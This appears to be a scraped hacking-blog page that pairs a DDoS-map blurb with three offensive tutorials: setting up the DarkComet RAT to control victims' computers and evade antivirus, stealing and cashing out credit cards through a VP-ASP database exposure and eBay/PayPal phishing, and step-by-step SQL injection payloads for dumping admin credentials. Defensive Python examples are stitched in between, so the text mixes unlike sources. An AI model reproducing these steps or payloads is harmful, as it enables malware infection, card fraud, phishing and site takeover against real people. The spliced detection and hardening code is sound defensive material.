Live Ddos View

Live DDoS Attack Map | Apakau

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world every day.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Thursday, May 21, 2015

Setup DarkComet Full Tutorial + Port Forwarding Solution


  • How Can You Hack a Computer?
  • What Is DNS, and What Is Its Use in a RAT (Remote Administration Tool)?
  • What Is UPnP?
  • How to Set Up UPnP for RATs
  • How to Set Up DarkComet
  • How to Port Forward TCP/UDP
  • Set Up a RAT Without Port Forwarding
  • List of the Top Ten RATs

Before starting, please note that this tutorial is for educational purposes only. I am not responsible for anything you do after reading this tutorial.

Many people these days have been asking me to write an article on how to set up a RAT (Remote Administration Tool), which is used to remotely control computers or, in simple words, to hack computers.

To set up a RAT you must have basic knowledge of some important things, which we will discuss below. Many people on the internet are searching for how to set up a RAT, but they get confused by the different methods and fail to set up their RAT server. After reading this article, I guarantee that you will be able to set up your RAT server.

  1. How Can You Hack a Computer?
Everyone asks this question. There are many ways to hack a computer by exploiting it, and one of the best-known ways, used by many hackers, is to execute the RAT server on the victim's computer. Once the server has been executed, you can control that computer from A to Z, meaning everything.

  2. What Is DNS, and What Is Its Use in a RAT?
DNS stands for Domain Name System. We use DNS in our RAT to make our server long-lasting, even permanent: with the help of DNS we can access our slave's computer for a long time, until the DNS hostname expires.

DNS plays a middleman role between your IP address and the victim's IP address to transfer the data. If we use our IP address in the RAT server, the server will work and we will be able to hack the victim's PC, but IP addresses change over time, and when ours changes we lose all of our slaves. This is why we use DNS: when the slave's computer sends data such as pictures to us, it first sends the data to the DNS server, the DNS server verifies our latest IP address, and after verifying it sends the data to us via our IP.

To make it easy for you, I have prepared a drawing so you can understand it quite easily.

In this picture you can see that DNS plays a middleman role and only updates our IP address, so even if our IP changes over time we need not worry about losing our slaves.

How can you get a DNS service?
You can get a free DNS service from www.noip.com
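
From the defender's side, the dynamic-DNS hostname is only resolved to the operator's current address and the infected host then connects to that address directly, so a detection keyed on the hostname survives the address changes described above while an IP blocklist does not. The following is an added example, not part of the original tutorial: the log formats, sample records, zone list and port allowlist are all constructed assumptions.

```python
from collections import defaultdict

# Illustrative sample of dynamic-DNS parent zones (assumption: use a
# maintained provider list in production).
DYNDNS_SUFFIXES = ("ddns.net", "hopto.org", "zapto.org", "no-ip.org", "no-ip.biz")
# Destination ports treated as routine for outbound client traffic (assumption).
COMMON_PORTS = {25, 53, 80, 123, 443, 465, 587, 993}

# Constructed resolver log: timestamp, client, queried name, answer.
DNS_LOG = """\
2015-05-21T10:00:01 10.0.0.12 www.example.com 93.184.216.34
2015-05-21T10:00:05 10.0.0.37 host-a.ddns.net 203.0.113.50
2015-05-21T10:05:05 10.0.0.37 host-a.ddns.net 203.0.113.50
2015-05-22T09:00:02 10.0.0.37 host-a.ddns.net 198.51.100.7
2015-05-22T09:10:00 10.0.0.40 cam.hopto.org 192.0.2.9
"""

# Constructed flow log: timestamp, source, destination, destination port, protocol.
FLOW_LOG = """\
2015-05-21T10:00:02 10.0.0.12 93.184.216.34 443 tcp
2015-05-21T10:00:06 10.0.0.37 203.0.113.50 1122 tcp
2015-05-22T09:00:03 10.0.0.37 198.51.100.7 1122 tcp
2015-05-22T09:10:01 10.0.0.40 192.0.2.9 443 tcp
2015-05-22T09:10:02 truncated-record
"""


def is_dyndns(name):
    """True if name is, or is a subdomain of, a listed dynamic-DNS zone."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def parse(log, fields):
    """Split whitespace-delimited log lines into dicts, skipping malformed ones."""
    rows = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == len(fields):
            rows.append(dict(zip(fields, parts)))
    return rows


def find_dyndns_callbacks(dns_log, flow_log):
    """Return {(client, hostname): {"ips": [...], "ports": [...]}} for clients
    that resolved a dynamic-DNS name and then connected to the answer on a
    port outside COMMON_PORTS."""
    # Map (client, resolved address) back to the dynamic-DNS name it came from.
    resolved = {}
    for r in parse(dns_log, ("ts", "client", "qname", "answer")):
        if is_dyndns(r["qname"]):
            resolved[(r["client"], r["answer"])] = r["qname"].lower().rstrip(".")

    hits = defaultdict(lambda: {"ips": set(), "ports": set()})
    for f in parse(flow_log, ("ts", "src", "dst", "dport", "proto")):
        host = resolved.get((f["src"], f["dst"]))
        if host is None or not f["dport"].isdigit():
            continue
        port = int(f["dport"])
        if port not in COMMON_PORTS:
            # Group by hostname so an address change stays one finding.
            hits[(f["src"], host)]["ips"].add(f["dst"])
            hits[(f["src"], host)]["ports"].add(port)
    return {key: {"ips": sorted(v["ips"]), "ports": sorted(v["ports"])}
            for key, v in hits.items()}


if __name__ == "__main__":
    for (client, host), info in find_dyndns_callbacks(DNS_LOG, FLOW_LOG).items():
        print(client, host, info["ips"], info["ports"])
```

The single finding for 10.0.0.37 lists both resolved addresses under one hostname; the host that reached a dynamic-DNS name on port 443 is not flagged by this rule and would need a separate review policy.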


What Is Port Forwarding, and What Is Its Use in a RAT?
  Port is a protocol which is used to transfer data from one IP address to another IP address, and there are two types of ports, which are mentioned below.
  • TCP
  • UDP
   TCP and UDP are the two types of ports that are the backbone of setting up your RAT server. We have to forward both TCP and UDP, with the same number, on our computer and also on our router. Many people make one big mistake: they forward the TCP/UDP port only on their computer or only on their router. So please keep in mind that you have to forward both the TCP and UDP port, with the same number, on your router as well as on your computer.


What If You Can't Forward the Port to Set Up a RAT?
 If you can't forward the port for some reason, there is one more option left for you, which is like a wildcard: I will show you how to set up a RAT using the UPnP function, so you can set it up without port forwarding.


What Is UPnP, and What Is Its Key Role in a RAT?
 Universal Plug and Play is a set of networking protocols that permits networked devices to send and receive data on any port which is being used and called by UPnP. As I mentioned, many people have problems with port forwarding, so today I will share two methods of setting up a RAT, one with port forwarding and one without, and both work well for me.

Now we have learned almost every basic thing necessary to set up a RAT server, so let's get started.

TUTORIAL:

First download DarkComet from here " Click here to download ", and to forward your port also download the auto port forwarding tool " click here to download auto port forwarding tool ".
To get started you should download two things: one is the RAT (Remote Administration Tool) and the second is the No-IP client. The No-IP client will automatically update our IP to the DNS.

For this tutorial I will be using the famous and most stable RAT tool, "Dark Comet V 5.3". I am not providing a download link, so that in future you cannot blame me for sharing a virus; search on Google for "Dark-Comet 5.3". It is the most stable and working version.

NO-IP Setup 

  • Go to www.noip.com and click on Sign Up
  • Fill in the form and choose the free DNS option



Step 1  ( Port Forwarding ) 
  
1. Open CMD and type
  ipconfig
After this you will find the Default Gateway IP address, so note it down or copy it.

 Note: Every router has a different gateway theme.

2. Open a web browser, type the IP address in the URL address bar, and the gateway login will appear.

3. Login to the Router 

Default usernames and passwords are
  • user : admin
  • pass : admin
  • user  : admin
  • pass  : admin123  ( If you fail to log in, try Googling your router's default user and password, or contact the admin )

4. After logging in, find the place to forward ports; on my router the path is Networking > Forwarding.

5. After finding the port forwarding section, write down your IPv4 address, which you can also find by typing " ipconfig " in cmd.
  • Write the IP address in the Server's IP box
  • Write port number 1122 in the begin and end boxes and select TCP/UDP; if you have only one choice, select TCP, and after adding TCP add UDP in the same way.
  • Click Save


After forwarding the TCP/UDP port on the router, open DarkComet
  • Click on the Socket tab

  • Right-click in the Socket Handle box, click Add Port To Listen, and write port " 1122 " in the box.

  • After writing the port, click Listen and it will start listening
  • Now go to www.canyouseeme.org

  • If you get Success in green, you have done it: the port is forwarded and there is now a 100% chance that your RAT will work. If you get an error in red saying " Error: I could not see your service on....." then you have done something wrong in forwarding your port on the router, so try searching Google for " How to port forward on 'your router name' ".
  • Note that if you are still getting that error, please read further below: we can also set up the RAT using the UPnP function, so please have some patience and move on to UPnP.


UPnP ( Setup Without Port Forwarding )
Note: If you have successfully forwarded your port, skip this and move to Step 2.


 Many routers have the UPnP function, but check that UPnP is enabled on your router by logging in and looking in the forwarding or networking section.

  • You must have uTorrent, so download it - Click here
  • Open Dark-Comet and click on Socket

  • Now right-click below the Socket Handle and a box will open; write port 1122 in that box

  • Note: Do not close DarkComet; leave it as it is
  • Now open uTorrent and click Options > Preferences
  • Write port 1122 in the box near the random port option and click OK

  • After clicking OK you are done: the port is now forwarded using UPnP, so check it by entering your port at www.canyouseeme.org

The Myth Or Logic Behind that trick

 STEP 2 ( Creation of Server )

  • To create the server, click on DarkComet-RAT to open the options
  • Then click on Server Module and then on Minimalist.

  • A box will appear and you have to type your details in it.

  1. In Stub ID write your server name.
  2. In IP/DNS write the DNS address which you created when you signed up on www.noip.com.
  3. In Port write the same port you forwarded, " 1122 ".
  4. Click on Normal, choose the path where to save the server, and click Save.

Step 4 ( Setting Up the No-IP DNS Client )

  • Download the No-IP client by clicking here ( or go to noip.com and click on download )
  • After downloading, install it and open it
  • If you can't find it, search for " DUC " in the Start menu

  • Click on Edit Hosts

  • Choose your hosts by ticking the check box and click Save

Now click Refresh Now and you will see 3 green signals, which is a good sign. Keep in mind that before starting DarkComet you should refresh it once, because it will update your IP address for your slaves so you can access them. Also, if you do not refresh your No-IP in 60 days they will delete your account, so refresh your No-IP daily.

Now send the server which you created to any of your victim which you want to hack and after he executes that server on his/her Computer then he will appear on your DarkComet Module and you can control his pc for a long time.

Note that do not try to test the server on your own computer because it will not work on your own computer so try to test it on any,ones computer and the victim must not have Anti Virus because Dark comet is detected by almost every anti Virus so you will have to encrypt your server to make it Undetectable.


Tutorial Hacking Credit Card

Hi Cyberworlds member. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).



This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and company secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear containing these:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetype
  • xEmail
  • xEmailName
  • xEmailSubject
  • xEmailSystem
  • xEmailType
  • xOrdernumber
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
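
The exposure described in this section comes down to a database file and a diagnostic script sitting inside the directory the web server serves, where any visitor can request them by name. A site owner can audit for exactly that; the following is an added example (not VP-ASP's code and not from the original post), and the extension list, the prefixes other than `diag_`, and the `wwwroot`/`data` layout are assumptions.

```python
import tempfile
from pathlib import Path

# File types that hold data and should never be reachable by URL (assumption:
# extend to match the stack in use).
DATA_EXTENSIONS = {".mdb", ".accdb", ".sqlite", ".db", ".sql", ".bak"}
# Script types the server would execute.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".php"}
# "diag_" comes from the diag_dbtest.asp page named above; the others are
# hypothetical prefixes for similar leftover test pages.
DIAG_PREFIXES = ("diag_", "debug_", "test_")


def audit_web_root(web_root):
    """Return sorted (relative_path, issue) pairs for files under web_root
    that expose data or diagnostics to anyone who requests them."""
    root = Path(web_root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        suffix = path.suffix.lower()
        if suffix in DATA_EXTENSIONS:
            findings.append((rel, "data-file-in-web-root"))
        elif suffix in SCRIPT_EXTENSIONS and path.name.lower().startswith(DIAG_PREFIXES):
            findings.append((rel, "diagnostic-script-deployed"))
    return sorted(findings)


def build_sample_site(base):
    """Create a constructed directory tree mirroring the paths in this
    section, plus one database stored correctly outside the web root."""
    base = Path(base)
    web_root = base / "wwwroot"
    files = [
        web_root / "shop" / "shopdisplaycategories.asp",
        web_root / "shop" / "diag_dbtest.asp",
        web_root / "shop" / "shopping140.mdb",
        web_root / "shop" / "resx" / "shopping140.mdb",
        base / "data" / "shopping140.mdb",  # outside the web root: not served
    ]
    for f in files:
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_bytes(b"")
    return web_root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, issue in audit_web_root(build_sample_site(tmp)):
            print(f"{issue:28} {rel}")
```

Each finding is fixed by moving the database outside the served directory and deleting the diagnostic page from production; the default admin credentials listed above need to be changed separately, since no file audit will catch them.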


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use emaileBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.

SQL Injection Tutorial! 100% NOOB FRIENDLY!!

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Bookmark this for future reference if you want.


Lets start. 

 
What is SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.


Source


Step 1: Choose Your Target 

Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerable sites are able to be injected into. You can't just SQL Inject any site *sigh*.
 
So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
 
Dorks 
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.
 
I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.
 
After you have Googled the dorks, click on any site.
 
To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:
 
 
http://www.sitename.com/main.php?id=232' 
If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column 

Now that we found our vulnerable site, we will need to find the vulnerable columns.
 
Add this to the end of the URL:
 
 
http://www.sitename.com/main.php?id=232 order by 1-- 
Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:
 
 
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!) 
The goal here is to find the lowest column number that shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.
 
Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5-- 
Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.
 
Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.


Step 3: Obtain Version Number and Database Name 

That vulnerable column is the ONLY column that we will be editing.
 
Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5-- 
If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.
 
Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5-- 
And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.

Step 4: Obtain Table Names 

We are almost done, don't give up just yet.
 
Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail addresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.
 
Edit the code as follows:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()-- 
Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", "Admin_pass", "User_id", etc..
 
The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1-- 
This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.
 
When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.
 
For this tutorial, we will be using the table name of "admin".


Step 5: View the Columns, and Find the Fucking Crucial Shit 

Here comes the fun part :3
 
To find the column names, add this to the end of the URL:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"-- 
Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where it says "Say Hello to My Little Friend".
 
In my case, this is the string that I got after I inputted "admin" to the input space:
 
 
61646d696e 
Now, replace the table name with hex as so:
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e-- 
Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.
 
Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:
 
 
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc.. 
Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):
 
 
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin-- 
The "0x3a" will put a colon to where the information will be separated. You should get something like this:
 
 
1:MyName:e10adc3949ba59abbe56e057f20f883e 
The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here .
 
Now as you can see. This is the login info:
 
 
Username: MyName
Pass: 123456 
Now all you have to do is find the admin page, which is usually 
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.
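
Every step of this tutorial depends on the `id` request parameter being pasted into the SQL text, so the fix is to type-check the value and pass it as a bound parameter. The following added example (not from the original thread) runs the tutorial's own probe strings against a concatenating handler and a hardened one; it uses an in-memory SQLite database in place of the MySQL backend the tutorial assumes, and the table, columns and function names are hypothetical.

```python
import re
import sqlite3

SAMPLE_ID = 232
COLUMNS = "id, author, created, title, body"  # five columns, as in the tutorial

# Probe strings taken from the steps above.
PAGE_INPUTS = [
    "232",
    "232'",
    "232 order by 5--",
    "232 order by 6--",
    "-232 union select 1,2,3,4,5--",
]


def make_db():
    """Constructed one-row database standing in for the site's backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, author TEXT, "
               "created TEXT, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (?, 'editor', '2015-05-21', "
               "'Hello', 'Sample body')", (SAMPLE_ID,))
    return db


def get_article_vulnerable(db, raw_id):
    """BEFORE: the request parameter becomes part of the SQL statement."""
    query = "SELECT " + COLUMNS + " FROM articles WHERE id = " + raw_id
    return db.execute(query).fetchall()


def get_article_hardened(db, raw_id):
    """AFTER: strict typing first, then a bound parameter."""
    # ASCII digits only; anything else never reaches the database.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    query = "SELECT " + COLUMNS + " FROM articles WHERE id = ?"
    return db.execute(query, (int(raw_id),)).fetchall()


def outcome(handler, db, raw_id):
    """Summarise what a visitor would observe for one request."""
    try:
        rows = handler(db, raw_id)
    except sqlite3.Error:
        return "error"        # the database error the tutorial looks for
    if not rows:
        return "empty"
    if all(row[0] == SAMPLE_ID for row in rows):
        return "article"      # the legitimate record
    return "injected"         # rows chosen by the request, not the application


def compare():
    """Map each probe to (vulnerable outcome, hardened outcome)."""
    db = make_db()
    return {value: (outcome(get_article_vulnerable, db, value),
                    outcome(get_article_hardened, db, value))
            for value in PAGE_INPUTS}


if __name__ == "__main__":
    for value, (before, after) in compare().items():
        print(f"{value!r:36} vulnerable={before:9} hardened={after}")
```

With the hardened handler the quote probe and the `order by` column count produce no error and no change in output, which removes the signal Steps 1 and 2 rely on; a production handler should also log rejected values and return a generic error page rather than database messages.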
